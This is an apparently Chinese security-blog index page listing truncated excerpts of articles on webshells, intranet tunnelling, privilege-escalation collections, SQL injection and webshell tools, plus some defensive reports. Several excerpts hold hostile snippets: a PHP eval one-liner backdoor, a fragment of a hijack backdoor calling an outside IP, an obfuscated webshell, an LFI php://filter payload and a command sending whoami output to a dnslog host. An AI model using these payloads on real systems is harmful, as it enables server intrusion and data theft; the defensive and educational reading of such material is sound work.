记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

如何进行内网穿透

当我们通过 webshell 或者其它一些方式获取到一台可以访问内网的服务器权限后,如果要做进一步的渗透,往往要访问内网中的其它主机,但其它主机在内网中,我们无法直接访问。由于控制的服务器处于内网中,所以我们可以通过这台服务器作为跳板进行内网穿透。 这篇文章将会使用之前搭建的环境(搭建一个简单的Windows域环境)对内网穿透常用的技术及防御手段进行介绍。这里需要再准备多一台 ubuntu 虚拟机作为 linux 服务器, kali 虚拟机作为攻击机 内网穿透使用的技术主要有下面几种: 端口转发 socks 代理 dns 隧道 icmp 隧道 端口转发 端口转发技术主要是把目标内网的主机的端口转发到公网可以访问的主机端口中。根据转发的方向不同,也可以分成正向端口转发和反
发布时间:2020-06-30 20:13 | 阅读:3990 | 评论:0 | 标签:内网渗透 dns 隧道 frp icmp 隧道 iptables kali netsh reGeorg socat so

细说渗透江湖之柳暗花明又一村

这是 酒仙桥六号部队 的第 3 篇文章。 全文共计3684个字,预计阅读时长10分钟。 背景 某年的某个夏天,某医院需要做攻防演练,而且是全仿真的演练,只有客户名,没有任何资产信息。时间紧,任务重,于是我们兵分两路,一波人在远程从外围突破,我和另一个小伙则踏上了旅途,准备从内部来瓦解。 出师未捷险被抓 目标是当地最著名的医院,大夏天的依旧是人山人海,我们行走其间,完全无人注意。红蓝对抗中,最爽的事儿是什么?当然是能直接连入目标的内网。 于是我们进入医院后,首先就开始搜寻wifi,看是否有直接访问内网的可能。医院的就诊wifi应该是给病人临时用的,本身没有密码,使用手机号即可登录。 找了个角落,掏出电脑一
发布时间:2020-06-03 19:24 | 阅读:11487 | 评论:0 | 标签:内网渗透 0day 445端口 ftp弱口令 OA系统 teamviewer webshell Wifi 域控 攻防演练

Windows 下的提权大合集

Windows 下的提权大合集 项目地址:https://github.com/lyshark/Windows-exploits Windows平台提权漏洞集合 项目地址:https://github.com/SecWiki/windows-kernel-exploits 各大平台提权工具 项目地址:https://github.com/klsfct/getshell Windwos辅助提权脚本 项目地址:https://github.com/ianxtianxt/win-exp- SweetPotato修改版,用于webshell下执行命令 项目地址:https://github.com/uknowsec/SweetPotato Webshell下提权执行命令
发布时间:2020-05-13 20:45 | 阅读:12320 | 评论:0 | 标签:Windows webshell windows 平台提权漏洞 提权 提权工具 辅助提权脚本

MySQL注入点写入WebShell的几种方式

在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。 比如:当面对一个MySQL注入点,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。 一个MySQL注入点写入Webshell,需要满足哪些条件呢?简单来说,需要了解secure_file_priv是否支持数据导出、还有当前数据库用户权限,当然,root用户数据库的全部权限,但写入Webshell 并不需要一定是root用户。 接下来,本文将通过构造一个注入点,分享几种Webshell写入的技巧。 0x01 构造一个注入点 1、在默认数
发布时间:2020-04-30 17:27 | 阅读:21884 | 评论:0 | 标签:系统安全 FILE权限 log mysql注入 Union select webshell 分隔符 注入

NSA发布WebShell恶意软件检测与预防报告

美国国家安全局(NSA)和澳大利亚信号局(ASD)本周发布了一份安全公告,警告企业尽快从Web服务器和内部服务器中检测常见的WebShell恶意软件。两家机构现已发布了一份长达17页的联合报告[https://media.defense.gov/2020/Apr/22/2002285959/-1/-1/0/DETECT%20AND%20PREVENT%20WEB%20SHELL%20MALWARE.PDF ],其中包含一些工具,可帮助系统管理员检测和处理这些WebShell威胁,包括:用于将生产网站与知名图片进行比较的脚本Splunk查询,用于检测Web流量中的异常URL互联网信息服务(IIS)日志分析工具常见WebShell的网络流量签名识别意外网络流量的说明识别Sysmon数据中异常流程调用的说明使用Aud
发布时间:2020-04-25 19:07 | 阅读:23314 | 评论:0 | 标签:行业动态 首页动态 NSA Webshell 报告调研

错误页面中隐藏webshell的骚思路

恶意软件发布者、黑客和钓鱼诈骗犯现在都喜欢把webshell隐藏在虚假HTTP错误页面中。这些页面常常伪装为错误页面,比如404未找到页面或者403禁止页面,然而它们实际上是webshell登录表单页,攻击者能够获得webshell并且在服务器上执行系统命令。这种技术并不新鲜,不过钓鱼专家和安全研究员nullcookies发现这种利用虚假错误页面隐藏webshell的做法近来有所增加。攻击者通过webshell能够上传恶意软件、钓鱼脚本或其他软件。nullcookies说,这种技术很早就有了,但我发现,最近在这种做法越来越频繁,非常明显。如果不是对这种技术有所了解,人们通常都会忽视这种页面。为了完成这篇文章,nullc
发布时间:2018-07-31 12:20 | 阅读:125646 | 评论:0 | 标签:Web安全 webshell

Powershell-Github-Shell:利用Github来做控制端的Powershell版本的Shell

项目主页 https://github.com/zlocal/Powershell-Github-Shell Author:zshell 简介 一般遇到比如说需要执行代码的时候就反弹一个shell回来.比如,一个SA权限的aspx注入,盲注的话,查结果又异常的麻烦,大多情况可能用nc会比较多,但NC的麻烦和限制或者是需要上传文件上去,而且如果是NAT情况又要有一个外网的服务器来监听使其回连。想到现在流行的windows 2008和win7及以上的比较主流,于是就周末时间利用了powershell,通过GITHUB的GIST接口实现一个反弹的shell. 特点 无程序,可以使用一句话远程内存加载powershell执行,不被杀。 HTTPS协议,在保密性和穿透性上优 易于扩展其它功能,比如加上文件上传下载就相当
发布时间:2016-12-30 00:50 | 阅读:131899 | 评论:0 | 标签:工具 Powershell-Github-Shell powershell的webshell webshell 免杀we

Weevely3:一个可用于远程服务器管理和渗透测试的命令行webshell

项目主页 https://github.com/epinna/weevely3 简介 weevely3是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。Weevely类似于菜刀,一个厚客户端,与一个轻服务端,由客户端生成要执行的代码,传递到服务端执行。与菜刀不同的是Weevely只提供命令行终端,同时自己生成服务端文件。 安装 Linux Debian/Ubuntu # Make sure that the python package manager and yaml libraries are instal
发布时间:2016-11-12 18:55 | 阅读:332916 | 评论:0 | 标签:工具 webshell Weevely3 命令行

novahot:一个面向渗透测试人员的webshell开源框架

项目主页 https://github.com/chrisallenlane/novahot 简介 novahot是一款面向渗透测试的开源webshell框架。它实现了一个基于JSON-based的API,可以用任何语言编写的木马进行通信。它默认附带了用PHP,Ruby和Python编写的木马。 除了执行系统命令,novahot还能够模拟终端进行交互,包括mysql,sqlite3,和psql。另外,它还实现了虚拟终端,便于上传,下载,编辑和查看远程文件。 安装 直接从NPM安装: [sudo] npm install -g novahot 然后配置文件 novahot config > ~/.novahotrc 使用 查看现有可用的木马列表: novahot trojan list 选择目标语言的一个木
发布时间:2016-11-09 03:05 | 阅读:162602 | 评论:0 | 标签:工具 novahot webshell webshell管理 渗透测试

中国最大的Webshell后门箱子调查,所有公开大马全军覆没

起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0);define('u_b','/');define('s_u','http:// 107.182.228.74/');define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER
发布时间:2016-11-01 16:00 | 阅读:430549 | 评论:0 | 标签:WEB安全 头条 系统安全 webshell 博彩 后门

烽火18台系列之八——Webshell,隐藏在网站之下的潘多拉魔盒

近年来网站被植入后门等隐蔽性攻击呈逐年增长态势,国家互联网应急响应中心发布的《2015年中国互联网网络安全报告》中指出,“2015年CNCERT/CC共监测到境内75028个网站被植入后门,其中政府网站有3514个。” 而Webshell则是最常用的一种网站后门工具,盛邦安全通过大量对被黑网站的应急发现,绝大多数黑客是通过后门进行的修改,并在篡改后删除后门及服务器日志。但与Webshell的危害程度相反的是,许多信息中心并没有非常重视该问题,或者可以说,业界并没有提供很好的解决办法。本文将根据盛邦安全对于Webshell的一些研究做些总结,希望给大家一些借鉴意义。 你知道或者不知道的Webshell 对于Webshell在这里我会简单介绍一下,更详细的内容大家可以百度或者查看公众号“唯品会应急响应中心”之前发
发布时间:2016-08-25 06:25 | 阅读:126865 | 评论:0 | 标签:威胁情报 Webshell 盛邦安全

PwnLab挑战技术解析

概要 这是一个boot2root的叫做Pwnlab的挑战。 我把拿到flag过程记录了下来: 过程 用vbox运行Pwnlab,并用nmap扫描下,扫描结果如下: 我们可以看到开放了80端口,打开发现运行着一个web应用。 这个应用程序包含一个登陆页面,主页和上传页面。我尝试浏览robots.txt文件,然而并不存在。所以我们使用dirb来枚举存在的目录。 打开config.php,页面是一片空白。 对网站进行扫描后,找到了一个本地文件包含漏洞,通过php://filter的方式加以利用。试着来读取index.php的源码: php://filter/convert.base64-encode/resource=index 注:php://filter可以参考:《谈一谈php://filter的妙用》
发布时间:2016-08-22 16:55 | 阅读:220771 | 评论:0 | 标签:Web安全 burpsuite ctf flag nc nmap php://filter PwnLab robots

那些年我们渗透过的灰鸽子官网

前言 上次因为被灰鸽子骗了,所以全过程的思路分享并没有写出来。那么今天,我们来弥补掉这个遗憾。没错!灰鸽子再次沦陷。 踩点 首先灰鸽子有两个域名: www.hgzvip.net ,域名注册人hkmangguo@vip.qq.com www.huigezi.org,域名注册人hkmangguo@vip.qq.com 域名商PDR LTD. D/B/A PUBLICDOMA,曾经比中国万网还牛的国外知名域名商;想必客服质量特别高2333。 半年前,我们渗透的是www.huigezi.org,那么今天我们同样要渗透这个站点 两个域名从注册人来看,明显是同一家公司。我们在查看同IP站点的时候两个网站并不在同一台服务器。这个时候,我们也不知道是不是同一个服务器,我们先进行前期信息收集。在使用人肉及密码库对比的时候,顺
发布时间:2016-08-18 04:15 | 阅读:189365 | 评论:0 | 标签:Web安全 NET对称加密 SymmetricAlgorithm webshell 加盐密文 密码学 渗透 灰鸽子

使用Powershell反弹Meterpreter Shell

撸站时难免会遇到一些比较特殊的情况,遇到一个可以执行命令的点(Windows,可连外网),却无法获得回显;这种情况下我通常会用这几种方法去尝试: 使用CloudEye获取命令执行的结果 找Web路径写WebShell 下载一个MSF的Payload直接反弹 某些情况下目标直接对公网开放3389,直接加个账户用完再删… 先说第一种方法, 使用CloudEye获取回显结果: for /F %x in ('whoami') do start http://cmd.xxxxx.dnslog.info/[%x].jpg执行这条命令,会调用默认的浏览器去打开后面的地址,我们可以获取到whoami的命令执行结果。 这里有一点比较坑的情况是如果结果中一行有空格,那这一行空格后面的结果会丢掉。 比如我执行Dir
发布时间:2016-08-16 21:05 | 阅读:131020 | 评论:0 | 标签:Web安全 CloudEye Meterpreter Shell Payload powershell webshell

看我如何绕过一个Webshell认证

当一个网站被攻击之后,攻击者通常会留一个后门或者webshell,便于将来继续控制该网站。通常会对这些webshell做一些混淆来躲避检测。并且也需要认证,保证只有攻击者能通过它控制网站。首先,我会还原混淆处理了的webshell,并演示如何在只有源代码而没有密码的情况下绕过认证。看下面的webshell例子,它被放置在某个被攻破的网站上:<?php$auth_pass = "64a113a4ccc22cffb9d2f75b8c19e333";$color = "#df5";$default_action = 'FilesMan';$default_use_ajax = true;$default_charset = 'Windows-1251';preg_replace("/.*/
发布时间:2016-05-19 18:45 | 阅读:175506 | 评论:0 | 标签:WEB安全 webshell 反混淆 认证

如何基于菜刀PHP一句话实现单个文件批量上传?

本文原创作者:安全小飞侠0×00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0×01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见的php一句话木马:<?php eval($_POST[1]); ?>当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的
发布时间:2015-12-28 16:05 | 阅读:159619 | 评论:0 | 标签:工具 php webshell 一句话 一句话木马 菜刀

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云